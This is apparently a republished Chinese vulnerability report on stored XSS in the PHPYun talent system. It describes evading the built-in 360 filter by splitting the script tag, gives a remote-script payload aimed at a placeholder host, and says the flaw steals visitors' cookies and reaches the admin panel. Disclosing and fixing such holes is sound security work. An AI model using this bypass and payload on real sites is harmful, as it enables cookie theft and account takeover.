php云人才系统多处Xss 漏洞 (绕过360),可影响后台及其他用户。 360防护挂掉了,这该怎么办。。
虽然php云人才系统里加入360防注入脚本,对于一般的xss都可以过滤但是我意外的发现了一种绕过方法,从而对多处产生xss影响 先说下绕过方法 <script>肯定是过不了的,但是<scr%20ipt>就可以了 至于这个%20加哪就随意了,总之就是不要使句子完整出现,这样可以绕过360,然后是数据提交后,会变回<script>,从而绕过。 可以利用的xss地方很多 凡是有编辑器, 源码 模式下直接插入<scr%20ipt src="http://XXXX"></sc%20ript>就行 以官网demo为例子,除了上述地方可以插入xss代码外,在http://www.hr135.com/friend
到个人中心看一下
成功插进去 也就是说当别人访问自己的空间时,就可以盗取对方cookie 再说下一处Xss漏洞 举例地址:http://www.hr135.com/ask/index.php 回答别人的问题
有了后台的权限 自然。。。
修复方案:这个。。。你们比我懂。。。
查看更多关于php云人才系统多处Xss漏洞(绕过360防护) - 网站的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did15148